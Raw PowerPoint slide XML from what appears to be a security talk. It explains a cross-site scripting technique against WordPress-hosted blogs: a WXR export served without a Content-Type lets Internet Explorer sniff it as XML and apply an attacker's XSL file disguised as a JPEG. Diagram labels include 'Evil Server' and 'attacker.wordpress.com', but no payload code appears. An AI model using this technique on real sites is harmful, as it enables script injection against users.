            <a:chExt cx="1150919" cy="907294"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2067" name="Picture 19" descr="C:\Users\jesseou.REDMOND\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V3PM8B76\MC90043777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229" y="3586828"/>
              <a:ext cx="1150919" cy="90729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2.bp.blogspot.com/-i_7-wu_NZsU/Th2wjiXAgBI/AAAAAAAAHLA/iPaA2tsDFMw/s400/javascrip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516" y="3636870"/>
              <a:ext cx="720071" cy="720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2" name="Group 2071"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="363125" y="2798870"/>
            <a:ext cx="2151475" cy="3238733"/>
            <a:chOff x="363125" y="2798870"/>
            <a:chExt cx="2151475" cy="3238733"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="61" name="Straight Arrow Connector 60"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1215243" y="2798870"/>
              <a:ext cx="1" cy="12074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3" name="TextBox 62"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="363125" y="4006278"/>
              <a:ext cx="2151475" cy="2031325"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>If Bad Guy could execute script in his </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
                <a:t>own domain</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>, he couldn’t really access the DOM of another domain because of the SOP</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20936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2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20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2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="206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72"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="207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62"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="206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68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="206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051"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="circle(in)">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="2000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2051"/>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path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 4.16667E-6 -4.32932E-6 L 0.15104 -4.32932E-6 C 0.21892 -4.32932E-6 0.3026 0.08927 0.3026 0.16235 L 0.3026 0.32493 " pathEditMode="relative" rAng="0" ptsTypes="FfFF">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2051"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="15122" y="16235"/>
                                    </p:animMotion>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068"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="206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069"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(down)">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>We just need to be able to execute JavaScript in our domain and we win! But how?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2051" name="Group 2050"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6252103" y="4949472"/>
            <a:ext cx="808757" cy="637560"/>
            <a:chOff x="509229" y="3586826"/>
            <a:chExt cx="1150919" cy="907294"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2067" name="Picture 19" descr="C:\Users\jesseou.REDMOND\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V3PM8B76\MC90043777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29" y="3586826"/>
              <a:ext cx="1150919" cy="90729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2.bp.blogspot.com/-i_7-wu_NZsU/Th2wjiXAgBI/AAAAAAAAHLA/iPaA2tsDFMw/s400/javascrip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516" y="3636870"/>
              <a:ext cx="720072" cy="72007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685800" y="2283824"/>
            <a:ext cx="3124200" cy="1631216"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Using a combination of a Safe HTML API and Output Encoding, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> made it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0"/>
              <a:t>very hard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>to execute JavaScript on your own blog.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Down Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493804" y="3761152"/>
            <a:ext cx="325356" cy="10394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jesseou.REDMOND\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\UTVB90A1\MM900236240[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22776" y="3950376"/>
            <a:ext cx="539816" cy="6609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926041" y="2132940"/>
            <a:ext cx="3581400" cy="1447685"/>
            <a:chOff x="4926041" y="2132940"/>
            <a:chExt cx="3581400" cy="1447685"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4926041" y="2132940"/>
              <a:ext cx="3581400" cy="144768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 name="Picture 2" descr="WordPress logo.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7245" y="2437740"/>
              <a:ext cx="2362200" cy="538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97245" y="2976322"/>
              <a:ext cx="2424510" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>attacker.wordpress.com</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2706052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fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Problem: We can only upload “safe” media files, and the Content-Type is explicitly set when you try to download them</a:t>
            </a:r>
            <a:endParaRPr lang="en-U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83" y="1600200"/>
            <a:ext cx="8534400" cy="274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041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06"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>But, there is a feature that lets you import/download your old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1" smtClean="0"/>
              <a:t>WordPress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t> blog in XML format (WXR file)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3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6232"/>
            <a:ext cx="9144000" cy="525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37797" y="5246132"/>
            <a:ext cx="5106204" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>They do validate that the input is ACTUALLY well formed XML</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356177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59" y="2057400"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Content-Type was not set when downloading WXR files, so IE will sniff the response, determine the file is actually XML, apply our XSL, and…. we have script executing in our own domain!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Litebulb"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3886200"/>
            <a:ext cx="1600200" cy="240277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47564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068453" y="980445"/>
            <a:ext cx="1905000" cy="2133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Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1356722" y="1156975"/>
            <a:ext cx="3581400" cy="144768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6" name="Picture 2" descr="WordPress logo.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926" y="1462330"/>
            <a:ext cx="2362200" cy="5385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7926" y="2000912"/>
            <a:ext cx="2424510" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attacker.wordpress.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7443263" y="2673378"/>
            <a:ext cx="1155381" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Evil Server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7514019" y="1171915"/>
            <a:ext cx="1119089" cy="875330"/>
            <a:chOff x="5334000" y="4775766"/>
            <a:chExt cx="1119089" cy="875330"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="TextBox 20"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5334000" y="5281764"/>
              <a:ext cx="1119089" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>Remote.js</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="22" name="Picture 2" descr="http://2.bp.blogspot.com/-i_7-wu_NZsU/Th2wjiXAgBI/AAAAAAAAHLA/iPaA2tsDFMw/s400/javascrip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0545" y="4775766"/>
              <a:ext cx="505998" cy="50599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http://www.browser-watch.com/wp-content/uploads/2010/09/IE9-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0895" y="5211488"/>
            <a:ext cx="832668" cy="832668"/>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a:endCxn id="1026" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3581400" y="2604660"/>
            <a:ext cx="3659495" cy="302316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nvGrpSpPr>
          <p:cNvPr id="6151" name="Group 6150"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1648391" y="4876066"/>
            <a:ext cx="1125886" cy="927961"/>
            <a:chOff x="1514388" y="3235707"/>
            <a:chExt cx="1125886" cy="927961"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1514388" y="3794336"/>
              <a:ext cx="1125886" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" smtClean="0"/>
                <a:t>Badxsl.jpg</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1028" name="Picture 4" descr="http://images.findicons.com/files/icons/1637/file_icons_vs_2/256/xm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0203" y="3235707"/>
              <a:ext cx="594255" cy="5942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52" name="Group 6151"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3887386" y="4851277"/>
            <a:ext cx="888641" cy="927797"/>
            <a:chOff x="4826023" y="3200081"/>
            <a:chExt cx="888641" cy="927797"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4826023" y="3758546"/>
              <a:ext cx="888641" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1"/>
                <a:t>f</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
                <a:t>oo.wxr</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="41" name="Picture 4" descr="http://images.findicons.com/files/icons/1637/file_icons_vs_2/256/xm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8167" y="3200081"/>
              <a:ext cx="594255" cy="59425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163" name="Straight Arrow Connector 6162"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="4331706" y="2604660"/>
            <a:ext cx="3182313" cy="271051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6164" name="TextBox 6163"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5633152" y="3531482"/>
            <a:ext cx="3245697" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>GET attacker.wordpress.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>foo.wxr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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5306" y="5100041"/>
            <a:ext cx="2198772" cy="1358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95600" y="5206921"/>
            <a:ext cx="984565" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Bad Guy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4141406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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="615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0.02431 -0.06868 L -0.06806 -0.15171 C -0.07795 -0.16905 -0.08316 -0.19519 -0.08316 -0.22224 C -0.08316 -0.25323 -0.07795 -0.27798 -0.06806 -0.29533 L -0.02431 -0.37858 " pathEditMode="relative" rAng="16200000" ptsTypes="FffFF">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6151"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-2934" y="-15495"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="17" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="37" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 3.88889E-6 -8.14061E-7 L 0.06111 -0.1154 C 0.07378 -0.13992 0.07777 -0.17414 0.07482 -0.2086 C 0.07014 -0.24676 0.06111 -0.27752 0.0427 -0.29672 L -0.0382 -0.39084 " pathEditMode="relative" rAng="15780198" ptsTypes="FffFF">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="2726" y="-20305"/>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63"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="616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64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="616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163"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="616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6164"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="616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0.03837 -0.39107 L 0.31997 0.03076 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6152"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="17917" y="21092"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="46" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -2.5E-6 4.91212E-6 L -0.09114 0.50925 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-4566" y="25463"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="48" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.02431 -0.37858 L 0.49149 -0.00092 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="2000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6151"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="25781" y="18871"/>
                                    </p:animMotion>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29"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1029"/>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029"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>r</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animRot>
                                    <p:animRot by="-240000">
                                      <p:cBhvr>
                                        <p:cTn id="59" dur="200" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="200"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1029"/>
                                        </p:tgtEl>
